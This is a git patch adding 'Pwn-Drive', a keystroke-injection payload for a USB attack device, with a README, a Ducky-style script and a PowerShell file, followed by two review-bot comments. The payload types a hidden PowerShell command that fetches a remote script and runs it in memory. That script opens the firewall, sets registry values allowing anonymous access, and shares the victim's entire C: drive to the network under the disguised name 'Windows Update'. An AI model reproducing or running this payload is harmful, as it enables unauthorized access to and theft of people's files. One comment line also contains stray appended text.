From 85ecdd5889c21f778002a6de8409c182cf9e53c6 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:10:33 -0400 Subject: [PATCH] Add files via upload --- .../library/exfiltration/Pwn-Drive/README.md | 107 ++++++++++++++++++ payloads/library/exfiltration/Pwn-Drive/c.ps1 | 14 +++ .../exfiltration/Pwn-Drive/payload.txt | 16 +++ 3 files changed, 137 insertions(+) create mode 100644 payloads/library/exfiltration/Pwn-Drive/README.md create mode 100644 payloads/library/exfiltration/Pwn-Drive/c.ps1 create mode 100644 payloads/library/exfiltration/Pwn-Drive/payload.txt diff --git a/payloads/library/exfiltration/Pwn-Drive/README.md b/payloads/library/exfiltration/Pwn-Drive/README.md new file mode 100644 index 00000000..c3211bb1 --- /dev/null +++ b/payloads/library/exfiltration/Pwn-Drive/README.md @@ -0,0 +1,107 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Pwn-Drive + +A payload to share the victims "C:" drive to the network. + +## Description + +This payload will share the entire victims "C:" drive to the entire network for further exploitation. + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Pwn-Drive/c.ps1 b/payloads/library/exfiltration/Pwn-Drive/c.ps1
new file mode 100644
index 00000000..798b9eea
--- /dev/null
+++ b/payloads/library/exfiltration/Pwn-Drive/c.ps1
@@ -0,0 +1,14 @@
+#Pwn-Drive
+
+#Enable Network Discovery
+netsh advfirewall firewall set rule group=”network discovery” new enable=yes
+
+#Enable File and Print
+netsh firewall set service type=fileandprint mode=enable profile=all
+
+#Setting Registry Values for allowing access to drive without credentials
+Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force
+Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force
+
+#Sharing the Drive
+New-SmbShare -Name "Windows Update" -Path "C:\"
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Pwn-Drive/payload.txt b/payloads/library/exfiltration/Pwn-Drive/payload.txt
new file mode 100644
index 00000000..a5dd5245
--- /dev/null
+++ b/payloads/library/exfiltration/Pwn-Drive/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Pwn-Drive
+
+REM Author: atomiczsec
+
+REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
+
+REM Target: Windows 10
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
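Review bot: The script carries no header describing what it leaves behind on the host: the two firewall changes, the `everyoneincludesanonymous` and LanManServer registry writes, and the `Windows Update` share over `C:\` all persist after the run, and neither this file nor the README says how to put them back. I would add a comment block at the top that lists each change and the value it replaced, so a tester can restore the machine and a responder can recognise the footprint, along the lines of `# Persistent changes: firewall rule group, fileandprint service, Lsa and LanManServer\Parameters values, SMB share "Windows Update" -> C:\ ; record prior values and revert after the test`. The share name does not describe what is shared, so the comment should state plainly that it maps the drive root. The README's Description section is the other place where this list is missing.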
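Review bot: The last REM line ends with `mode con:cols=14 lines=1` run straight onto the word `properly`, which reads like text left over from another script rather than part of the comment; if it is in the committed file it should be dropped so the line ends at `properly`. The header REMs also give only a one-line description, so a line such as `REM Changes: firewall rules, two registry values, SMB share of C:\` would tell a reader what the staged script alters without opening c.ps1.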